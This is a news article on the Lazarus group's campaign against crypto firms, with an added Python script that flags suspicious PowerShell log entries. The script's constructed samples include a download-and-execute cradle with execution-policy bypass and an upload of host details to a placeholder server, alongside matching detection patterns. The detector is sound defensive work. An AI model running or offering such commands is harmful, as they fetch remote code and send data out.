North Korean cybercrime group Lazarus still targeting crypto firms
It has been one of the most notorious cybercrime groups in the world for a number of years. Known as Lazarus, the group is believed to operate from North Korea, with reports suggesting it is sponsored by the country's government. It has been behind some of the biggest heists and intrusions of recent years, including the attacks on Sony Entertainment and Lockheed Martin and the Bangladeshi central bank heist.
In recent times, its principal focus has been the thriving field of crypto startups.
According to a report by Kaspersky Labs, the group has been evolving its tactics to avoid detection. Since November last year, Lazarus has been running a new operation in which it takes over its victims' computers, using PowerShell scripts against Windows users and customized macOS malware against Apple users.
The PowerShell scripts communicate with malicious C2 servers and execute commands sent by the operator: the malware can download and upload files, show and update its own configuration, and collect basic information about the host.
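The capabilities listed above (remote download and upload, host information collection) are the behaviours a defender would look for in PowerShell script-block logs (Event ID 4104). The following triage script is an added example, not code from the article or from Kaspersky's report; the log entries are constructed and the indicator patterns are assumptions about common PowerShell idioms, not signatures from the actual malware.

```python
"""Triage PowerShell script-block log entries for combined C2-style behaviours."""
import re

# Capability tag -> regexes for PowerShell idioms that commonly implement it.
# These are assumed indicators for illustration, not patterns from the real samples.
INDICATORS = {
    "c2_download": [r"Net\.WebClient", r"DownloadString|DownloadFile", r"Invoke-WebRequest|iwr\b"],
    "c2_upload": [r"UploadData|UploadString|UploadFile"],
    "host_recon": [r"Get-WmiObject|Get-CimInstance", r"\$env:COMPUTERNAME|\$env:USERNAME"],
    "evasion": [r"-(?:enc|EncodedCommand)\b", r"ExecutionPolicy\s+Bypass", r"FromBase64String"],
}


def score_script_block(text):
    """Return the set of capability tags whose indicators appear in one script block."""
    hits = set()
    for tag, patterns in INDICATORS.items():
        if any(re.search(p, text, re.IGNORECASE) for p in patterns):
            hits.add(tag)
    return hits


def triage(entries, min_tags=2):
    """Flag (entry_id, script_text) pairs that combine at least min_tags capabilities.
    A lone download or a lone WMI query is ordinary admin activity; a remote fetch
    combined with host recon, an upload, or evasion is what merits analyst review."""
    flagged = []
    for eid, text in entries:
        tags = score_script_block(text)
        if len(tags) >= min_tags:
            flagged.append((eid, sorted(tags)))
    return flagged


# Constructed sample log entries (not real captures); example.invalid is a reserved name.
SAMPLE_ENTRIES = [
    ("1", "Get-ChildItem C:\\Users | Where-Object { $_.PSIsContainer }"),
    ("2", "$wc = New-Object Net.WebClient; $wc.DownloadFile('https://example.invalid/cfg', \"$env:TEMP\\c.dat\")"),
    ("3", "$i = Get-WmiObject Win32_ComputerSystem; $wc = New-Object Net.WebClient; "
          "$wc.UploadString('https://example.invalid/p', \"$env:COMPUTERNAME $i\")"),
    ("4", "powershell -ExecutionPolicy Bypass -c \"IEX (New-Object Net.WebClient).DownloadString('https://example.invalid/s')\""),
]

if __name__ == "__main__":
    for eid, tags in triage(SAMPLE_ENTRIES):
        print(f"entry {eid}: {', '.join(tags)}")
```

Entry 2 is not flagged on its own because a single download is routine; entries 3 and 4 are flagged because they pair a remote fetch with an upload plus host recon, or with execution-policy evasion.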
Lazarus acquires the servers either by buying new ones or by compromising existing ones. Compromised servers make the attack much harder to detect, since the server itself looks legitimate. The servers are located on several continents, with Asia and Europe hosting the most.